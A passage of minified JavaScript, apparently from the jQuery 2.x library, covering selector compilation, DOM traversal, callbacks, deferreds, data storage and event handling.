d.filter)!(e=X[g].exec(h))||j[g]&&!(e=j[g](e))||(c=e.shift(),f.push({value:c,type:g,matches:e}),h=h.slice(c.length));if(!c)break}return b?h.length:h?gb.error(a):z(a,i).slice(0)};function rb(a){for(var b=0,c=a.length,d="";c>b;b++)d+=a[b].value;return d}function sb(a,b,c){var d=b.dir,e=c&&"parentNode"===d,f=x++;return b.first?function(b,c,f){while(b=b[d])if(1===b.nodeType||e)return a(b,c,f)}:function(b,c,g){var h,i,j=[w,f];if(g){while(b=b[d])if((1===b.nodeType||e)&&a(b,c,g))return!0}else while(b=b[d])if(1===b.nodeType||e){if(i=b[u]||(b[u]={}),(h=i[d])&&h[0]===w&&h[1]===f)return j[2]=h[2];if(i[d]=j,j[2]=a(b,c,g))return!0}}}function tb(a){return a.length>1?function(b,c,d){var e=a.length;while(e--)if(!a[e](b,c,d))return!1;return!0}:a[0]}function ub(a,b,c){for(var d=0,e=b.length;e>d;d++)gb(a,b[d],c);return c}function vb(a,b,c,d,e){for(var f,g=[],h=0,i=a.length,j=null!=b;i>h;h++)(f=a[h])&&(!c||c(f,d,e))&&(g.push(f),j&&b.push(h));return g}function wb(a,b,c,d,e,f){return d&&!d[u]&&(d=wb(d)),e&&!e[u]&&(e=wb(e,f)),ib(function(f,g,h,i){var j,k,l,m=[],n=[],o=g.length,p=f||ub(b||"*",h.nodeType?[h]:h,[]),q=!a||!f&&b?p:vb(p,m,a,h,i),r=c?e||(f?a:o||d)?[]:g:q;if(c&&c(q,r,h,i),d){j=vb(r,n),d(j,[],h,i),k=j.length;while(k--)(l=j[k])&&(r[n[k]]=!(q[n[k]]=l))}if(f){if(e||a){if(e){j=[],k=r.length;while(k--)(l=r[k])&&j.push(q[k]=l);e(null,r=[],j,i)}k=r.length;while(k--)(l=r[k])&&(j=e?J(f,l):m[k])>-1&&(f[j]=!(g[j]=l))}}else r=vb(r===g?r.splice(o,r.length):r),e?e(null,g,r,i):H.apply(g,r)})}function xb(a){for(var b,c,e,f=a.length,g=d.relative[a[0].type],h=g||d.relative[" "],i=g?1:0,k=sb(function(a){return a===b},h,!0),l=sb(function(a){return J(b,a)>-1},h,!0),m=[function(a,c,d){var e=!g&&(d||c!==j)||((b=c).nodeType?k(a,c,d):l(a,c,d));return b=null,e}];f>i;i++)if(c=d.relative[a[i].type])m=[sb(tb(m),c)];else{if(c=d.filter[a[i].type].apply(null,a[i].matches),c[u]){for(e=++i;f>e;e++)if(d.relative[a[e].type])break;return wb(i>1&&tb(m),i>1&&rb(a.slice(0,i-1).concat({value:" "===a[i-2].type?"*":""})).replace(R,"$1"),c,e>i&&xb(a.slice(i,e)),f>e&&xb(a=a.slice(e)),f>e&&rb(a))}m.push(c)}return tb(m)}function yb(a,b){var c=b.length>0,e=a.length>0,f=function(f,g,h,i,k){var l,m,o,p=0,q="0",r=f&&[],s=[],t=j,u=f||e&&d.find.TAG("*",k),v=w+=null==t?1:Math.random()||.1,x=u.length;for(k&&(j=g!==n&&g);q!==x&&null!=(l=u[q]);q++){if(e&&l){m=0;while(o=a[m++])if(o(l,g,h)){i.push(l);break}k&&(w=v)}c&&((l=!o&&l)&&p--,f&&r.push(l))}if(p+=q,c&&q!==p){m=0;while(o=b[m++])o(r,s,g,h);if(f){if(p>0)while(q--)r[q]||s[q]||(s[q]=F.call(i));s=vb(s)}H.apply(i,s),k&&!f&&s.length>0&&p+b.length>1&&gb.uniqueSort(i)}return k&&(w=v,j=t),r};return c?ib(f):f}return h=gb.compile=function(a,b){var c,d=[],e=[],f=A[a+" "];if(!f){b||(b=g(a)),c=b.length;while(c--)f=xb(b[c]),f[u]?d.push(f):e.push(f);f=A(a,yb(e,d)),f.selector=a}return f},i=gb.select=function(a,b,e,f){var i,j,k,l,m,n="function"==typeof a&&a,o=!f&&g(a=n.selector||a);if(e=e||[],1===o.length){if(j=o[0]=o[0].slice(0),j.length>2&&"ID"===(k=j[0]).type&&c.getById&&9===b.nodeType&&p&&d.relative[j[1].type]){if(b=(d.find.ID(k.matches[0].replace(cb,db),b)||[])[0],!b)return e;n&&(b=b.parentNode),a=a.slice(j.shift().value.length)}i=X.needsContext.test(a)?0:j.length;while(i--){if(k=j[i],d.relative[l=k.type])break;if((m=d.find[l])&&(f=m(k.matches[0].replace(cb,db),ab.test(j[0].type)&&pb(b.parentNode)||b))){if(j.splice(i,1),a=f.length&&rb(j),!a)return H.apply(e,f),e;break}}}return(n||h(a,o))(f,b,!p,e,ab.test(a)&&pb(b.parentNode)||b),e},c.sortStable=u.split("").sort(B).join("")===u,c.detectDuplicates=!!l,m(),c.sortDetached=jb(function(a){return 1&a.compareDocumentPosition(n.createElement("div"))}),jb(function(a){return a.innerHTML="<a href='#'></a>","#"===a.firstChild.getAttribute("href")})||kb("type|href|height|width",function(a,b,c){return c?void 0:a.getAttribute(b,"type"===b.toLowerCase()?1:2)}),c.attributes&&jb(function(a){return a.innerHTML="<input/>",a.firstChild.setAttribute("value",""),""===a.firstChild.getAttribute("value")})||kb("value",function(a,b,c){return c||"input"!==a.nodeName.toLowerCase()?void 0:a.defaultValue}),jb(function(a){return null==a.getAttribute("disabled")})||kb(K,function(a,b,c){var d;return c?void 0:a[b]===!0?b.toLowerCase():(d=a.getAttributeNode(b))&&d.specified?d.value:null}),gb}(a);n.find=t,n.expr=t.selectors,n.expr[":"]=n.expr.pseudos,n.unique=t.uniqueSort,n.text=t.getText,n.isXMLDoc=t.isXML,n.contains=t.contains;var u=n.expr.match.needsContext,v=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,w=/^.[^:#\[\.,]*$/;function x(a,b,c){if(n.isFunction(b))return n.grep(a,function(a,d){return!!b.call(a,d,a)!==c});if(b.nodeType)return n.grep(a,function(a){return a===b!==c});if("string"==typeof b){if(w.test(b))return n.filter(b,a,c);b=n.filter(b,a)}return n.grep(a,function(a){return g.call(b,a)>=0!==c})}n.filter=function(a,b,c){var d=b[0];return c&&(a=":not("+a+")"),1===b.length&&1===d.nodeType?n.find.matchesSelector(d,a)?[d]:[]:n.find.matches(a,n.grep(b,function(a){return 1===a.nodeType}))},n.fn.extend({find:function(a){var b,c=this.length,d=[],e=this;if("string"!=typeof a)return this.pushStack(n(a).filter(function(){for(b=0;c>b;b++)if(n.contains(e[b],this))return!0}));for(b=0;c>b;b++)n.find(a,e[b],d);return d=this.pushStack(c>1?n.unique(d):d),d.selector=this.selector?this.selector+" "+a:a,d},filter:function(a){return this.pushStack(x(this,a||[],!1))},not:function(a){return this.pushStack(x(this,a||[],!0))},is:function(a){return!!x(this,"string"==typeof a&&u.test(a)?n(a):a||[],!1).length}});var y,z=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,A=n.fn.init=function(a,b){var c,d;if(!a)return this;if("string"==typeof a){if(c="<"===a[0]&&">"===a[a.length-1]&&a.length>=3?[null,a,null]:z.exec(a),!c||!c[1]&&b)return!b||b.jquery?(b||y).find(a):this.constructor(b).find(a);if(c[1]){if(b=b instanceof n?b[0]:b,n.merge(this,n.parseHTML(c[1],b&&b.nodeType?b.ownerDocument||b:l,!0)),v.test(c[1])&&n.isPlainObject(b))for(c in b)n.isFunction(this[c])?this[c](b[c]):this.attr(c,b[c]);return this}return d=l.getElementById(c[2]),d&&d.parentNode&&(this.length=1,this[0]=d),this.context=l,this.selector=a,this}return a.nodeType?(this.context=this[0]=a,this.length=1,this):n.isFunction(a)?"undefined"!=typeof y.ready?y.ready(a):a(n):(void 0!==a.selector&&(this.selector=a.selector,this.context=a.context),n.makeArray(a,this))};A.prototype=n.fn,y=n(l);var B=/^(?:parents|prev(?:Until|All))/,C={children:!0,contents:!0,next:!0,prev:!0};n.extend({dir:function(a,b,c){var d=[],e=void 0!==c;while((a=a[b])&&9!==a.nodeType)if(1===a.nodeType){if(e&&n(a).is(c))break;d.push(a)}return d},sibling:function(a,b){for(var c=[];a;a=a.nextSibling)1===a.nodeType&&a!==b&&c.push(a);return c}}),n.fn.extend({has:function(a){var b=n(a,this),c=b.length;return this.filter(function(){for(var a=0;c>a;a++)if(n.contains(this,b[a]))return!0})},closest:function(a,b){for(var c,d=0,e=this.length,f=[],g=u.test(a)||"string"!=typeof a?n(a,b||this.context):0;e>d;d++)for(c=this[d];c&&c!==b;c=c.parentNode)if(c.nodeType<11&&(g?g.index(c)>-1:1===c.nodeType&&n.find.matchesSelector(c,a))){f.push(c);break}return this.pushStack(f.length>1?n.unique(f):f)},index:function(a){return a?"string"==typeof a?g.call(n(a),this[0]):g.call(this,a.jquery?a[0]:a):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(a,b){return this.pushStack(n.unique(n.merge(this.get(),n(a,b))))},addBack:function(a){return this.add(null==a?this.prevObject:this.prevObject.filter(a))}});function D(a,b){while((a=a[b])&&1!==a.nodeType);return a}n.each({parent:function(a){var b=a.parentNode;return b&&11!==b.nodeType?b:null},parents:function(a){return n.dir(a,"parentNode")},parentsUntil:function(a,b,c){return n.dir(a,"parentNode",c)},next:function(a){return D(a,"nextSibling")},prev:function(a){return D(a,"previousSibling")},nextAll:function(a){return n.dir(a,"nextSibling")},prevAll:function(a){return n.dir(a,"previousSibling")},nextUntil:function(a,b,c){return n.dir(a,"nextSibling",c)},prevUntil:function(a,b,c){return n.dir(a,"previousSibling",c)},siblings:function(a){return n.sibling((a.parentNode||{}).firstChild,a)},children:function(a){return n.sibling(a.firstChild)},contents:function(a){return a.contentDocument||n.merge([],a.childNodes)}},function(a,b){n.fn[a]=function(c,d){var e=n.map(this,b,c);return"Until"!==a.slice(-5)&&(d=c),d&&"string"==typeof d&&(e=n.filter(d,e)),this.length>1&&(C[a]||n.unique(e),B.test(a)&&e.reverse()),this.pushStack(e)}});var E=/\S+/g,F={};function G(a){var b=F[a]={};return n.each(a.match(E)||[],function(a,c){b[c]=!0}),b}n.Callbacks=function(a){a="string"==typeof a?F[a]||G(a):n.extend({},a);var b,c,d,e,f,g,h=[],i=!a.once&&[],j=function(l){for(b=a.memory&&l,c=!0,g=e||0,e=0,f=h.length,d=!0;h&&f>g;g++)if(h[g].apply(l[0],l[1])===!1&&a.stopOnFalse){b=!1;break}d=!1,h&&(i?i.length&&j(i.shift()):b?h=[]:k.disable())},k={add:function(){if(h){var c=h.length;!function g(b){n.each(b,function(b,c){var d=n.type(c);"function"===d?a.unique&&k.has(c)||h.push(c):c&&c.length&&"string"!==d&&g(c)})}(arguments),d?f=h.length:b&&(e=c,j(b))}return this},remove:function(){return h&&n.each(arguments,function(a,b){var c;while((c=n.inArray(b,h,c))>-1)h.splice(c,1),d&&(f>=c&&f--,g>=c&&g--)}),this},has:function(a){return a?n.inArray(a,h)>-1:!(!h||!h.length)},empty:function(){return h=[],f=0,this},disable:function(){return h=i=b=void 0,this},disabled:function(){return!h},lock:function(){return i=void 0,b||k.disable(),this},locked:function(){return!i},fireWith:function(a,b){return!h||c&&!i||(b=b||[],b=[a,b.slice?b.slice():b],d?i.push(b):j(b)),this},fire:function(){return k.fireWith(this,arguments),this},fired:function(){return!!c}};return k},n.extend({Deferred:function(a){var b=[["resolve","done",n.Callbacks("once memory"),"resolved"],["reject","fail",n.Callbacks("once memory"),"rejected"],["notify","progress",n.Callbacks("memory")]],c="pending",d={state:function(){return c},always:function(){return e.done(arguments).fail(arguments),this},then:function(){var a=arguments;return n.Deferred(function(c){n.each(b,function(b,f){var g=n.isFunction(a[b])&&a[b];e[f[1]](function(){var a=g&&g.apply(this,arguments);a&&n.isFunction(a.promise)?a.promise().done(c.resolve).fail(c.reject).progress(c.notify):c[f[0]+"With"](this===d?c.promise():this,g?[a]:arguments)})}),a=null}).promise()},promise:function(a){return null!=a?n.extend(a,d):d}},e={};return d.pipe=d.then,n.each(b,function(a,f){var g=f[2],h=f[3];d[f[1]]=g.add,h&&g.add(function(){c=h},b[1^a][2].disable,b[2][2].lock),e[f[0]]=function(){return e[f[0]+"With"](this===e?d:this,arguments),this},e[f[0]+"With"]=g.fireWith}),d.promise(e),a&&a.call(e,e),e},when:function(a){var b=0,c=d.call(arguments),e=c.length,f=1!==e||a&&n.isFunction(a.promise)?e:0,g=1===f?a:n.Deferred(),h=function(a,b,c){return function(e){b[a]=this,c[a]=arguments.length>1?d.call(arguments):e,c===i?g.notifyWith(b,c):--f||g.resolveWith(b,c)}},i,j,k;if(e>1)for(i=new Array(e),j=new Array(e),k=new Array(e);e>b;b++)c[b]&&n.isFunction(c[b].promise)?c[b].promise().done(h(b,k,c)).fail(g.reject).progress(h(b,j,i)):--f;return f||g.resolveWith(k,c),g.promise()}});var H;n.fn.ready=function(a){return n.ready.promise().done(a),this},n.extend({isReady:!1,readyWait:1,holdReady:function(a){a?n.readyWait++:n.ready(!0)},ready:function(a){(a===!0?--n.readyWait:n.isReady)||(n.isReady=!0,a!==!0&&--n.readyWait>0||(H.resolveWith(l,[n]),n.fn.triggerHandler&&(n(l).triggerHandler("ready"),n(l).off("ready"))))}});function I(){l.removeEventListener("DOMContentLoaded",I,!1),a.removeEventListener("load",I,!1),n.ready()}n.ready.promise=function(b){return H||(H=n.Deferred(),"complete"===l.readyState?setTimeout(n.ready):(l.addEventListener("DOMContentLoaded",I,!1),a.addEventListener("load",I,!1))),H.promise(b)},n.ready.promise();var J=n.access=function(a,b,c,d,e,f,g){var h=0,i=a.length,j=null==c;if("object"===n.type(c)){e=!0;for(h in c)n.access(a,b,h,c[h],!0,f,g)}else if(void 0!==d&&(e=!0,n.isFunction(d)||(g=!0),j&&(g?(b.call(a,d),b=null):(j=b,b=function(a,b,c){return j.call(n(a),c)})),b))for(;i>h;h++)b(a[h],c,g?d:d.call(a[h],h,b(a[h],c)));return e?a:j?b.call(a):i?b(a[0],c):f};n.acceptData=function(a){return 1===a.nodeType||9===a.nodeType||!+a.nodeType};function K(){Object.defineProperty(this.cache={},0,{get:function(){return{}}}),this.expando=n.expando+K.uid++}K.uid=1,K.accepts=n.acceptData,K.prototype={key:function(a){if(!K.accepts(a))return 0;var b={},c=a[this.expando];if(!c){c=K.uid++;try{b[this.expando]={value:c},Object.defineProperties(a,b)}catch(d){b[this.expando]=c,n.extend(a,b)}}return this.cache[c]||(this.cache[c]={}),c},set:function(a,b,c){var d,e=this.key(a),f=this.cache[e];if("string"==typeof b)f[b]=c;else if(n.isEmptyObject(f))n.extend(this.cache[e],b);else for(d in b)f[d]=b[d];return f},get:function(a,b){var c=this.cache[this.key(a)];return void 0===b?c:c[b]},access:function(a,b,c){var d;return void 0===b||b&&"string"==typeof b&&void 0===c?(d=this.get(a,b),void 0!==d?d:this.get(a,n.camelCase(b))):(this.set(a,b,c),void 0!==c?c:b)},remove:function(a,b){var c,d,e,f=this.key(a),g=this.cache[f];if(void 0===b)this.cache[f]={};else{n.isArray(b)?d=b.concat(b.map(n.camelCase)):(e=n.camelCase(b),b in g?d=[b,e]:(d=e,d=d in g?[d]:d.match(E)||[])),c=d.length;while(c--)delete g[d[c]]}},hasData:function(a){return!n.isEmptyObject(this.cache[a[this.expando]]||{})},discard:function(a){a[this.expando]&&delete this.cache[a[this.expando]]}};var L=new K,M=new K,N=/^(?:\{[\w\W]*\}|\[[\w\W]*\])$/,O=/([A-Z])/g;function P(a,b,c){var d;if(void 0===c&&1===a.nodeType)if(d="data-"+b.replace(O,"-$1").toLowerCase(),c=a.getAttribute(d),"string"==typeof c){try{c="true"===c?!0:"false"===c?!1:"null"===c?null:+c+""===c?+c:N.test(c)?n.parseJSON(c):c}catch(e){}M.set(a,b,c)}else c=void 0;return c}n.extend({hasData:function(a){return M.hasData(a)||L.hasData(a)},data:function(a,b,c){return M.access(a,b,c)
     3 +},removeData:function(a,b){M.remove(a,b)},_data:function(a,b,c){return L.access(a,b,c)},_removeData:function(a,b){L.remove(a,b)}}),n.fn.extend({data:function(a,b){var c,d,e,f=this[0],g=f&&f.attributes;if(void 0===a){if(this.length&&(e=M.get(f),1===f.nodeType&&!L.get(f,"hasDataAttrs"))){c=g.length;while(c--)g[c]&&(d=g[c].name,0===d.indexOf("data-")&&(d=n.camelCase(d.slice(5)),P(f,d,e[d])));L.set(f,"hasDataAttrs",!0)}return e}return"object"==typeof a?this.each(function(){M.set(this,a)}):J(this,function(b){var c,d=n.camelCase(a);if(f&&void 0===b){if(c=M.get(f,a),void 0!==c)return c;if(c=M.get(f,d),void 0!==c)return c;if(c=P(f,d,void 0),void 0!==c)return c}else this.each(function(){var c=M.get(this,d);M.set(this,d,b),-1!==a.indexOf("-")&&void 0!==c&&M.set(this,a,b)})},null,b,arguments.length>1,null,!0)},removeData:function(a){return this.each(function(){M.remove(this,a)})}}),n.extend({queue:function(a,b,c){var d;return a?(b=(b||"fx")+"queue",d=L.get(a,b),c&&(!d||n.isArray(c)?d=L.access(a,b,n.makeArray(c)):d.push(c)),d||[]):void 0},dequeue:function(a,b){b=b||"fx";var c=n.queue(a,b),d=c.length,e=c.shift(),f=n._queueHooks(a,b),g=function(){n.dequeue(a,b)};"inprogress"===e&&(e=c.shift(),d--),e&&("fx"===b&&c.unshift("inprogress"),delete f.stop,e.call(a,g,f)),!d&&f&&f.empty.fire()},_queueHooks:function(a,b){var c=b+"queueHooks";return L.get(a,c)||L.access(a,c,{empty:n.Callbacks("once memory").add(function(){L.remove(a,[b+"queue",c])})})}}),n.fn.extend({queue:function(a,b){var c=2;return"string"!=typeof a&&(b=a,a="fx",c--),arguments.length<c?n.queue(this[0],a):void 0===b?this:this.each(function(){var c=n.queue(this,a,b);n._queueHooks(this,a),"fx"===a&&"inprogress"!==c[0]&&n.dequeue(this,a)})},dequeue:function(a){return this.each(function(){n.dequeue(this,a)})},clearQueue:function(a){return this.queue(a||"fx",[])},promise:function(a,b){var c,d=1,e=n.Deferred(),f=this,g=this.length,h=function(){--d||e.resolveWith(f,[f])};"string"!=typeof a&&(b=a,a=void 0),a=a||"fx";while(g--)c=L.get(f[g],a+"queueHooks"),c&&c.empty&&(d++,c.empty.add(h));return h(),e.promise(b)}});var Q=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,R=["Top","Right","Bottom","Left"],S=function(a,b){return a=b||a,"none"===n.css(a,"display")||!n.contains(a.ownerDocument,a)},T=/^(?:checkbox|radio)$/i;!function(){var a=l.createDocumentFragment(),b=a.appendChild(l.createElement("div")),c=l.createElement("input");c.setAttribute("type","radio"),c.setAttribute("checked","checked"),c.setAttribute("name","t"),b.appendChild(c),k.checkClone=b.cloneNode(!0).cloneNode(!0).lastChild.checked,b.innerHTML="<textarea>x</textarea>",k.noCloneChecked=!!b.cloneNode(!0).lastChild.defaultValue}();var U="undefined";k.focusinBubbles="onfocusin"in a;var V=/^key/,W=/^(?:mouse|pointer|contextmenu)|click/,X=/^(?:focusinfocus|focusoutblur)$/,Y=/^([^.]*)(?:\.(.+)|)$/;function Z(){return!0}function $(){return!1}function _(){try{return l.activeElement}catch(a){}}n.event={global:{},add:function(a,b,c,d,e){var f,g,h,i,j,k,l,m,o,p,q,r=L.get(a);if(r){c.handler&&(f=c,c=f.handler,e=f.selector),c.guid||(c.guid=n.guid++),(i=r.events)||(i=r.events={}),(g=r.handle)||(g=r.handle=function(b){return typeof n!==U&&n.event.triggered!==b.type?n.event.dispatch.apply(a,arguments):void 0}),b=(b||"").match(E)||[""],j=b.length;while(j--)h=Y.exec(b[j])||[],o=q=h[1],p=(h[2]||"").split(".").sort(),o&&(l=n.event.special[o]||{},o=(e?l.delegateType:l.bindType)||o,l=n.event.special[o]||{},k=n.extend({type:o,origType:q,data:d,handler:c,guid:c.guid,selector:e,needsContext:e&&n.expr.match.needsContext.test(e),namespace:p.join(".")},f),(m=i[o])||(m=i[o]=[],m.delegateCount=0,l.setup&&l.setup.call(a,d,p,g)!==!1||a.addEventListener&&a.addEventListener(o,g,!1)),l.add&&(l.add.call(a,k),k.handler.guid||(k.handler.guid=c.guid)),e?m.splice(m.delegateCount++,0,k):m.push(k),n.event.global[o]=!0)}},remove:function(a,b,c,d,e){var f,g,h,i,j,k,l,m,o,p,q,r=L.hasData(a)&&L.get(a);if(r&&(i=r.events)){b=(b||"").match(E)||[""],j=b.length;while(j--)if(h=Y.exec(b[j])||[],o=q=h[1],p=(h[2]||"").split(".").sort(),o){l=n.event.special[o]||{},o=(d?l.delegateType:l.bindType)||o,m=i[o]||[],h=h[2]&&new RegExp("(^|\\.)"+p.join("\\.(?:.*\\.|)")+"(\\.|$)"),g=f=m.length;while(f--)k=m[f],!e&&q!==k.origType||c&&c.guid!==k.guid||h&&!h.test(k.namespace)||d&&d!==k.selector&&("**"!==d||!k.selector)||(m.splice(f,1),k.selector&&m.delegateCount--,l.remove&&l.remove.call(a,k));g&&!m.length&&(l.teardown&&l.teardown.call(a,p,r.handle)!==!1||n.removeEvent(a,o,r.handle),delete i[o])}else for(o in i)n.event.remove(a,o+b[j],c,d,!0);n.isEmptyObject(i)&&(delete r.handle,L.remove(a,"events"))}},trigger:function(b,c,d,e){var f,g,h,i,k,m,o,p=[d||l],q=j.call(b,"type")?b.type:b,r=j.call(b,"namespace")?b.namespace.split("."):[];if(g=h=d=d||l,3!==d.nodeType&&8!==d.nodeType&&!X.test(q+n.event.triggered)&&(q.indexOf(".")>=0&&(r=q.split("."),q=r.shift(),r.sort()),k=q.indexOf(":")<0&&"on"+q,b=b[n.expando]?b:new n.Event(q,"object"==typeof b&&b),b.isTrigger=e?2:3,b.namespace=r.join("."),b.namespace_re=b.namespace?new RegExp("(^|\\.)"+r.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,b.result=void 0,b.target||(b.target=d),c=null==c?[b]:n.makeArray(c,[b]),o=n.event.special[q]||{},e||!o.trigger||o.trigger.apply(d,c)!==!1)){if(!e&&!o.noBubble&&!n.isWindow(d)){for(i=o.delegateType||q,X.test(i+q)||(g=g.parentNode);g;g=g.parentNode)p.push(g),h=g;h===(d.ownerDocument||l)&&p.push(h.defaultView||h.parentWindow||a)}f=0;while((g=p[f++])&&!b.isPropagationStopped())b.type=f>1?i:o.bindType||q,m=(L.get(g,"events")||{})[b.type]&&L.get(g,"handle"),m&&m.apply(g,c),m=k&&g[k],m&&m.apply&&n.acceptData(g)&&(b.result=m.apply(g,c),b.result===!1&&b.preventDefault());return b.type=q,e||b.isDefaultPrevented()||o._default&&o._default.apply(p.pop(),c)!==!1||!n.acceptData(d)||k&&n.isFunction(d[q])&&!n.isWindow(d)&&(h=d[k],h&&(d[k]=null),n.event.triggered=q,d[q](),n.event.triggered=void 0,h&&(d[k]=h)),b.result}},dispatch:function(a){a=n.event.fix(a);var b,c,e,f,g,h=[],i=d.call(arguments),j=(L.get(this,"events")||{})[a.type]||[],k=n.event.special[a.type]||{};if(i[0]=a,a.delegateTarget=this,!k.preDispatch||k.preDispatch.call(this,a)!==!1){h=n.event.handlers.call(this,a,j),b=0;while((f=h[b++])&&!a.isPropagationStopped()){a.currentTarget=f.elem,c=0;while((g=f.handlers[c++])&&!a.isImmediatePropagationStopped())(!a.namespace_re||a.namespace_re.test(g.namespace))&&(a.handleObj=g,a.data=g.data,e=((n.event.special[g.origType]||{}).handle||g.handler).apply(f.elem,i),void 0!==e&&(a.result=e)===!1&&(a.preventDefault(),a.stopPropagation()))}return k.postDispatch&&k.postDispatch.call(this,a),a.result}},handlers:function(a,b){var c,d,e,f,g=[],h=b.delegateCount,i=a.target;if(h&&i.nodeType&&(!a.button||"click"!==a.type))for(;i!==this;i=i.parentNode||this)if(i.disabled!==!0||"click"!==a.type){for(d=[],c=0;h>c;c++)f=b[c],e=f.selector+" ",void 0===d[e]&&(d[e]=f.needsContext?n(e,this).index(i)>=0:n.find(e,this,null,[i]).length),d[e]&&d.push(f);d.length&&g.push({elem:i,handlers:d})}return h<b.length&&g.push({elem:this,handlers:b.slice(h)}),g},props:"altKey bubbles cancelable ctrlKey currentTarget eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),fixHooks:{},keyHooks:{props:"char charCode key keyCode".split(" "),filter:function(a,b){return null==a.which&&(a.which=null!=b.charCode?b.charCode:b.keyCode),a}},mouseHooks:{props:"button buttons clientX clientY offsetX offsetY pageX pageY screenX screenY toElement".split(" "),filter:function(a,b){var c,d,e,f=b.button;return null==a.pageX&&null!=b.clientX&&(c=a.target.ownerDocument||l,d=c.documentElement,e=c.body,a.pageX=b.clientX+(d&&d.scrollLeft||e&&e.scrollLeft||0)-(d&&d.clientLeft||e&&e.clientLeft||0),a.pageY=b.clientY+(d&&d.scrollTop||e&&e.scrollTop||0)-(d&&d.clientTop||e&&e.clientTop||0)),a.which||void 0===f||(a.which=1&f?1:2&f?3:4&f?2:0),a}},fix:function(a){if(a[n.expando])return a;var b,c,d,e=a.type,f=a,g=this.fixHooks[e];g||(this.fixHooks[e]=g=W.test(e)?this.mouseHooks:V.test(e)?this.keyHooks:{}),d=g.props?this.props.concat(g.props):this.props,a=new n.Event(f),b=d.length;while(b--)c=d[b],a[c]=f[c];return a.target||(a.target=l),3===a.target.nodeType&&(a.target=a.target.parentNode),g.filter?g.filter(a,f):a},special:{load:{noBubble:!0},focus:{trigger:function(){return this!==_()&&this.focus?(this.focus(),!1):void 0},delegateType:"focusin"},blur:{trigger:function(){return this===_()&&this.blur?(this.blur(),!1):void 0},delegateType:"focusout"},click:{trigger:function(){return"checkbox"===this.type&&this.click&&n.nodeName(this,"input")?(this.click(),!1):void 0},_default:function(a){return n.nodeName(a.target,"a")}},beforeunload:{postDispatch:function(a){void 0!==a.result&&a.originalEvent&&(a.originalEvent.returnValue=a.result)}}},simulate:function(a,b,c,d){var e=n.extend(new n.Event,c,{type:a,isSimulated:!0,originalEvent:{}});d?n.event.trigger(e,null,b):n.event.dispatch.call(b,e),e.isDefaultPrevented()&&c.preventDefault()}},n.removeEvent=function(a,b,c){a.removeEventListener&&a.removeEventListener(b,c,!1)},n.Event=function(a,b){return this instanceof n.Event?(a&&a.type?(this.originalEvent=a,this.type=a.type,this.isDefaultPrevented=a.defaultPrevented||void 0===a.defaultPrevented&&a.returnValue===!1?Z:$):this.type=a,b&&n.extend(this,b),this.timeStamp=a&&a.timeStamp||n.now(),void(this[n.expando]=!0)):new n.Event(a,b)},n.Event.prototype={isDefaultPrevented:$,isPropagationStopped:$,isImmediatePropagationStopped:$,preventDefault:function(){var a=this.originalEvent;this.isDefaultPrevented=Z,a&&a.preventDefault&&a.preventDefault()},stopPropagation:function(){var a=this.originalEvent;this.isPropagationStopped=Z,a&&a.stopPropagation&&a.stopPropagation()},stopImmediatePropagation:function(){var a=this.originalEvent;this.isImmediatePropagationStopped=Z,a&&a.stopImmediatePropagation&&a.stopImmediatePropagation(),this.stopPropagation()}},n.each({mouseenter:"mouseover",mouseleave:"mouseout",pointerenter:"pointerover",pointerleave:"pointerout"},function(a,b){n.event.special[a]={delegateType:b,bindType:b,handle:function(a){var c,d=this,e=a.relatedTarget,f=a.handleObj;return(!e||e!==d&&!n.contains(d,e))&&(a.type=f.origType,c=f.handler.apply(this,arguments),a.type=b),c}}}),k.focusinBubbles||n.each({focus:"focusin",blur:"focusout"},function(a,b){var c=function(a){n.event.simulate(b,a.target,n.event.fix(a),!0)};n.event.special[b]={setup:function(){var d=this.ownerDocument||this,e=L.access(d,b);e||d.addEventListener(a,c,!0),L.access(d,b,(e||0)+1)},teardown:function(){var d=this.ownerDocument||this,e=L.access(d,b)-1;e?L.access(d,b,e):(d.removeEventListener(a,c,!0),L.remove(d,b))}}}),n.fn.extend({on:function(a,b,c,d,e){var f,g;if("object"==typeof a){"string"!=typeof b&&(c=c||b,b=void 0);for(g in a)this.on(g,b,c,a[g],e);return this}if(null==c&&null==d?(d=b,c=b=void 0):null==d&&("string"==typeof b?(d=c,c=void 0):(d=c,c=b,b=void 0)),d===!1)d=$;else if(!d)return this;return 1===e&&(f=d,d=function(a){return n().off(a),f.apply(this,arguments)},d.guid=f.guid||(f.guid=n.guid++)),this.each(function(){n.event.add(this,a,d,c,b)})},one:function(a,b,c,d){return this.on(a,b,c,d,1)},off:function(a,b,c){var d,e;if(a&&a.preventDefault&&a.handleObj)return d=a.handleObj,n(a.delegateTarget).off(d.namespace?d.origType+"."+d.namespace:d.origType,d.selector,d.handler),this;if("object"==typeof a){for(e in a)this.off(e,b,a[e]);return this}return(b===!1||"function"==typeof b)&&(c=b,b=void 0),c===!1&&(c=$),this.each(function(){n.event.remove(this,a,c,b)})},trigger:function(a,b){return this.each(function(){n.event.trigger(a,b,this)})},triggerHandler:function(a,b){var c=this[0];return c?n.event.trigger(a,b,c,!0):void 0}});var ab=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,bb=/<([\w:]+)/,cb=/<|&#?\w+;/,db=/<(?:script|style|link)/i,eb=/checked\s*(?:[^=]|=\s*.checked.)/i,fb=/^$|\/(?:java|ecma)script/i,gb=/^true\/(.*)/,hb=/^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g,ib={option:[1,"<select multiple='multiple'>","</select>"],thead:[1,"<table>","</table>"],col:[2,"<table><colgroup>","</colgroup></table>"],tr:[2,"<table><tbody>","</tbody></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],_default:[0,"",""]};ib.optgroup=ib.option,ib.tbody=ib.tfoot=ib.colgroup=ib.caption=ib.thead,ib.th=ib.td;function jb(a,b){return n.nodeName(a,"table")&&n.nodeName(11!==b.nodeType?b:b.firstChild,"tr")?a.getElementsByTagName("tbody")[0]||a.appendChild(a.ownerDocument.createElement("tbody")):a}function kb(a){return a.type=(null!==a.getAttribute("type"))+"/"+a.type,a}function lb(a){var b=gb.exec(a.type);return b?a.type=b[1]:a.removeAttribute("type"),a}function mb(a,b){for(var 